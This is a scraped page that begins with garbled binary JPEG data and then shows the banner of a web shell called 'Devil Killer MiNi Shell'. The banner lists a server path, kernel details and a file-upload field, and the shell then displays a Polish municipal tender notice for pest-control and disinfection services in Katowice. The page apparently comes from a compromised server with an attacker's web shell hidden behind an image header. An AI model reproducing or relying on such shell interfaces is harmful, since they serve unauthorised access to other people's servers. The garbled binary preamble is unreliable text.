JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231201/0052724701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług deratyzacji, dezynsekcji i dezynfekcji w nieruchomościach zarządzanych przez KZGM w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMUNALNY ZAKŁAD GOSPODARKI MIESZKANIOWEJ W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 241031620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Michała Grażyńskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-126</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kzgm.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kzgm.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług deratyzacji, dezynsekcji i dezynfekcji w nieruchomościach zarządzanych przez KZGM w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e2155c4-8e91-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00527247</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034790/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Świadczenie usług dezynfekcji, dezynsekcji i deratyzacji w budynkach KZGM</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kzgm_katowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kzgm_katowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o sposobie porozumiewania się Zamawiającego z Wykonawcami, przekazywania dokumentów oraz udzielania wyjaśnień dotyczących treści SWZ - opisane są w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej „RODO”<br/>Zamawiający informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest Komunalny Zakład Gospodarki Mieszkaniowej w<br/>Katowicach, 40-126 Katowice, ul. Grażyńskiego 5, Telefon: 32 258 20 21 do 25 lub 32/416 32 91, Fax:<br/>32/258 20 25;<br/>2. z Inspektorem Ochrony Danych Osobowych można się skontaktować pod nr tel.: 032 416 32 85,<br/>e‑mail: iod@kzgm.katowice.pl lub pisemnie na adres Zamawiającego.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Prawo zamówień<br/>publicznych;<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba<br/>że przepisy szczególne stanowią inaczej;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Prawo zamówień publicznych;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*; • na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO**; • prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/> • w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> • prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> • na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.231.093.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 77895,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie:<br/> 1) deratyzacji,<br/> 2) dezynsekcji,<br/> 3) dezynfekcji i dezodoryzacji,<br/> 4) usuwania gniazd owadów np. os i szerszeni lub przeniesienie w inne miejsce gniazd pszczół lub trzmieli, <br/> 5) dezynfekcji, dezynsekcji i dezodoryzacji po zgonie, <br/> 6) dezynfekcji i dezodoryzacji po zalaniu nieczystościami ciekłymi wraz z usunięciem pozostałych nieczystości i ich utylizacją, <br/> 7) usuwania martwych ptaków, gryzoni i zwierząt domowych oraz nieczystości po nich (w tym odchodów, gniazd ptasich, itp.) wraz z ich utylizacją oraz dezynfekcją, dezynsekcją, dezodoryzacją oraz doczyszczeniem powierzchni będących przedmiotem zabiegów,<br/> 8) usuwania z lokali porzuconych przez użytkowników produktów żywnościowych wraz ze sprzętami w których były przechowywane i uległy zepsuciu, stwarzając zagrożenie epidemiologiczne, ich wywóz i utylizacja oraz przeprowadzenie w razie konieczności dezynsekcji, dezynfekcji i dezodoryzacji pomieszczenia,<br/> 9) dezynfekcji pomieszczeń, sprzętów oraz pojazdów (szczególnie samochodów), w których wystąpiło zakażenie wirusami będącymi zagrożeniem dla życia i zdrowia.<br/> 2. W zakresie używanych środków Zamawiający wymaga, aby były wpisane do Wykazu Produktów Biobójczych prowadzonego przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych oraz bezpiecznych dla ludzi i niewymagających zmywania. Środki należy stosować zgodnie z określonym przez producenta przeznaczeniem i sposobem użycia.<br/>3. Usługi zlecane przez Zamawiającego wykonywane będą w:<br/> 1) nieruchomościach zarządzanych przez Zamawiającego (powierzchnie wewnętrzne i tereny zewnętrzne), <br/> 2) lokalach zarządzanych przez Zamawiającego, a znajdujących się w nieruchomościach zarządzanych przez inne podmioty (w szczególności przez wspólnoty mieszkaniowe), <br/> 3) nieruchomościach oddanych Zamawiającemu do zabezpieczenia, które nie są zarządzane przez Zamawiającego (powierzchnie wewnętrzne i tereny zewnętrzne).<br/>4. Przedmiot umowy określony w ust. 1 realizowany będzie w oparciu o podpisane przez Kierownika lub upoważnionego pracownika danego Oddziału Eksploatacji Budynków zlecenie zgodnie ze wzorem stanowiącym załącznik nr 1. W celu potwierdzenia odbioru zlecenia, Wykonawca zobowiązany jest odesłać jego podpisany przez siebie skan e-mailem do Zamawiającego w terminie 4 godzin od chwili jego przesłania przez Zamawiającego.<br/> 5. W przypadku niedochowania terminu wskazanego w ust. 3, zlecenie uważa się za odebrane i przyjęte do realizacji w tym terminie. Powyższe nie zwalnia Wykonawcy z obowiązku niezwłocznego dostarczenia podpisanego przez siebie skanu zlecenia e-mailem do Zamawiającego.<br/>6. Zamawiający przewiduje następujące tryby zlecania usług :<br/> 1) okresowy - obejmuje deratyzację wykonywaną w terminach określonych corocznie w Zarządzeniu Prezydenta Miasta Katowice w sprawie przeprowadzenia akcji odszczurzania na terenie miasta Katowice, w nieruchomościach wymienionych w ust. 2 pkt. 1 i 3. Zamawiający poinformuje Wykonawcę o terminie wykonywania usługi e-mailem na 7 dni przed przystąpieniem do realizacji usługi,<br/> 2) doraźny – obejmuje wszystkie rodzaje usług wymienionych w ust. 1, przy czym świadczenie usługi realizowane będzie w terminie do 3 dni od daty otrzymania przez Wykonawcę pisemnego zlecenia e-mailem. Za datę otrzymania zlecenia przyjmuje się datę skutecznego dostarczenia go e-mailem, <br/> 3) awaryjny – obejmuje wszystkie rodzaje usług wymienionych w ust. 1, a świadczenie usługi realizowane będzie całodobowo, siedem dni w tygodniu, także w dni ustawowo wolne od pracy przez cały okres obowiązywania umowy, przy czym rozpoczęcie realizacji usługi nastąpi do 3 godzin po telefonicznym (potwierdzonym e-mailem) zgłoszeniu przez przedstawiciela Zamawiającego, zgodnie z załącznikiem nr 2.<br/>7. Zlecenia awaryjne wystawiane będą w nagłych przypadkach, w szczególności:<br/> a) stwarzających zagrożenie dla zdrowia mieszkańców, szczególnie dla dzieci, osób starszych oraz o osłabionym układzie odpornościowym (np. ujawnienie zwłok w lokalu, których stan wskazuje na ich zaawansowany rozkład, gniazda owadów w elewacji budynku, martwe ptaki i gryzonie),<br/> b) stwarzających zagrożenie dla zdrowia ludzkiego lub w wyniku których powstać mogą znaczne straty materialne i finansowe np. wskutek niszczenia elementów konstrukcji budynków, sprzętu (np. gniazda gryzoni w lokalach mieszkalnych, przegryzanie przewodów elektrycznych, niszczenie mebli itp.). <br/>8. Zlecenie określać będzie m. in.:<br/> a) rodzaj, miejsce wykonania usługi (adres) oraz powierzchnię, na której dana usługa ma być wykonana lub ilość w przypadku, gdy usługa dotyczy gniazd owadów, <br/> b) termin realizacji usługi (uwzględniający datę rozpoczęcia i zakończenia realizacji usługi, specyfikę danej nieruchomości i zakres zgłoszonych do realizacji prac),<br/> c) wynagrodzenie za usługę wyliczone w oparciu o powierzchnie (lub ilość) i stawki wskazane w ofercie, której kopia stanowi załącznik nr 3. <br/> 9. W przypadku, gdy zlecenie dotyczyć będzie terenów zewnętrznych, jako powierzchnię, na której ma być wykonana usługa zostanie wskazana powierzchnia np. boksu śmietnikowego albo innego obiektu, którego dotyczyć będzie zlecenie. W sytuacji konieczności użycia pułapek na gryzonie przeznaczonych do terenów zewnętrznych zastosowany zostanie przelicznik: jedna pułapka - 10 m².<br/> 10. Zlecenie może obejmować jedną lub więcej nieruchomości. W przypadku gdy zlecenie obejmować będzie więcej niż jedną nieruchomość Zamawiający załączy do zlecenia stosowną specyfikację. Zamawiający będzie wystawiał zlecenia odrębnie dla nieruchomości Skarbu Państwa i pozostałych nieruchomości.<br/> 11. W przypadku nieuzasadnionej odmowy wykonania zlecenia w trybie awaryjnym Zamawiający uprawniony jest do zlecenia wykonania zastępczego, bez odrębnego wezwania, na koszt Wykonawcy.<br/>12. Zamawiający przewiduje skorzystanie z instytucji PRAWA OPCJI. <br/>13. Szczegółowy opis przedmiotu zamówienia określają projektowane postanowienia umowy wraz z załącznikami (Załączniki nr 4 do SWZ).<br/> 14. Wykonawca zobowiązuje się wykonywać przedmiot zamówienia zgodnie z obowiązującymi przepisami prawa z najwyższą starannością, przestrzegając zasad bezpieczeństwa i higieny pracy (pracownicy/osoby faktycznie realizujące zlecenie powinny być w tym zakresie przeszkolone) oraz zapewnić Zamawiającemu dostęp za pośrednictwem telefonu/e-maila i pozostawać do jego dyspozycji w godzinach pracy Zamawiającego.<br/>15. Wszelkie obowiązki Wykonawcy i Zamawiającego oraz warunki realizacji przedmiotu zamówienia, sposób rozliczania zawierają projektowane postanowienia umowy stanowiące załącznik nr 4 do SWZ.<br/>16. Przedmiotowe środki dowodowe. Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia.<br/>17. Wymóg zatrudnienia na podstawie umowy o pracę<br/> Wymóg zatrudnienia na podstawie umowy o pracę ( aspekty społeczne): <br/>Wymagania zamawiającego w zakresie zatrudnienia na podstawie umowy o pracę zawarte są w § 3 projektowanych postanowień umowy. (Załącznik nr 4 do SWZ).<br/>19. Wymóg spełniania wymagań określonych przez przepisy ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (Dz. U. 2022 poz. 1083 z późn. zm.) został określony w § 5 projektowanych postanowień umowy (Załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90921000-9 - Usługi dezynfekcji i dezynsekcji budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90923000-3 - Usługi odszczurzania</p> <p class="mb-0">90670000-4 - Usługi w zakresie dezynfekcji oraz tępienia szkodników na obszarach miejskich lub wiejskich</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji w przypadku zwiększenia:<br/> a) liczby metrów kwadratowych powierzchni nieruchomości, w których wykonywane są usługi, w przypadku, np. objęcia do zarządzania lub zabezpieczenia nieruchomości przez Zamawiającego (deratyzacja okresowa),<br/> b) ilości poszczególnych usług będących przedmiotem umowy określonych w § 2 ust. 2 oraz wykorzystania całej kwoty wynikającej z zamówienia gwarantowanego, tj. kwoty wskazanej w § 9 ust. 2 lit. b).<br/> Zamówienie może się zwiększyć maksymalnie do ilości wskazanych w poniższej tabeli w kolumnie „ilość maksymalna”. Zamawiający jednak zastrzega sobie prawo do niewykorzystania całości zamówienia stanowiącej maksymalną ilość, a Wykonawcy nie przysługuje roszczenie z tego tytułu. Warunkiem skorzystania z prawa opcji jest pisemne złożenie przez Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie. Zasady dotyczące realizacji przedmiotu zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia obligatoryjnego i polegać będą na powtórzeniu podobnych usług.<br/>Maksymalna wartość opcji zgodnie z §2 ust. 3 i określona w § 9 ust. 2 lit. a) umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy polegających na powtórzeniu podobnych usług. Zamówienia polegać będą na powtórzeniu podobnych usług tj. usług w zakresie deratyzacji, dezynsekcji i dezynfekcji. Zamawiający przewiduje, że następujące szacowane ilości tych zamówień wyniosą:<br/> 1) deratyzacja obowiązkowa – 21000 m2,<br/> 2) deratyzacja doraźna – 600 m2,<br/> 3) dezynsekcja doraźna – 12000 m2,<br/> 4) dezynfekcja i dezodoryzacja doraźna – 9000 m2,<br/> 5) usuwanie gniazd owadów lub przeniesienie ich w inne miejsce – 12 szt.,<br/> 6) dezynfekcja, dezynsekcja i dezodoryzacja po zgonie - 3600 m2,<br/> 7) dezynfekcja i dezodoryzacja po zalaniu nieczystościami ciekłymi wraz z usunięciem pozostałych nieczystości i ich utylizacją – 900 m2,<br/> 8) usuwanie martwych ptaków, gryzoni i zwierząt domowych oraz nieczystości po nich (w tym odchodów, ptasich gniazd itp.) wraz z utylizacją oraz dezynfekcją, dezynsekcją i dezodoryzacją – 360 m2,<br/> 9) usuwanie porzuconych produktów żywnościowych wraz ze sprzętami, w których były przechowywane i uległy zepsuciu, ich wywóz i utylizacja i przeprowadzenie w razie konieczności dezynsekcji, dezynfekcji i dezodoryzacji pomieszczenia - 750 m2,<br/> 10)  dezynfekcja pomieszczeń oraz sprzętów, w których wystąpiło zakażenie wirusami będącymi zagrożeniem dla życia i zdrowia niezależnie od kubatury nieruchomości/ lokalu – 3000 m2,<br/> 11) awaryjne wykonanie deratyzacji gryzoni wraz z ich utylizacja – 1200 m2,<br/> 12) awaryjne wykonanie dezynsekcji – 1200 m2,<br/> 13) awaryjne wykonanie dezynfekcji i dezodoryzacji – 1200 m2,<br/> 14)  awaryjne usunięcie gniazd owadów lub przeniesienie ich w inne miejsce – 6 szt.,<br/> 15)  awaryjne wykonanie dezynfekcji, dezynsekcji i dezodoryzacji po zgonie – 1200 m2,<br/> 16)  awaryjne wykonanie dezynfekcji i dezodoryzacji po zalaniu nieczystościami ciekłymi wraz z usunięciem pozostałych nieczystości i ich utylizacją – 1200 m2,<br/> 17)  awaryjne usuwanie martwych ptaków, gryzoni i zwierząt domowych oraz nieczystości po nich (w tym odchodów, ptasich gniazd itp.) wraz z utylizacją oraz dezynfekcją, dezynsekcją i dezodoryzacją – 360 m2,<br/> 18)  awaryjne usuwanie porzuconych produktów żywnościowych wraz ze sprzętami, w których były przechowywane i uległy zepsuciu, ich wywóz i utylizacja i przeprowadzenie w razie konieczności dezynsekcji, dezynfekcji i dezodoryzacji pomieszczenia - 450 m2,<br/> 19)  awaryjne wykonanie dezynfekcji pomieszczeń oraz sprzętów, w których wystąpiło zakażenie wirusami będącymi zagrożeniem dla życia i zdrowia niezależnie od kubatury nieruchomości/ lokalu – 1500 m2.<br/> Zamówienia udzielone zostaną w przypadku wyczerpania kwoty wynikającej z prawa opcji, przedłużania się procedury udzielenia kolejnego zamówienia w trybie podstawowym, po uprzednim przeprowadzeniu zamówienia z wolnej ręki.<br/> Zamawiający udzieli zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy na następujących warunkach:<br/> 1) wykonawca realizował dotychczasowe zamówienie w terminie i z najwyższą starannością,<br/> 2) wykonawca zapewni nie gorszy standard wykonania nowego zamówienia niż podstawowego,<br/> 3) strony w wyniku negocjacji uzgodnią wynagrodzenie i termin wykonania nowego zamówienia. <br/> 4. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.<br/> 5. Postępowanie nie jest prowadzone w celu zawarcia umowy ramowej.<br/> 6. Koszty udziału w postępowaniu, a w szczególności koszty sporządzenia oferty, pokrywa Wykonawca. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu (za wyjątkiem zaistnienia sytuacji, o której mowa w art. 261 ustawy).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny 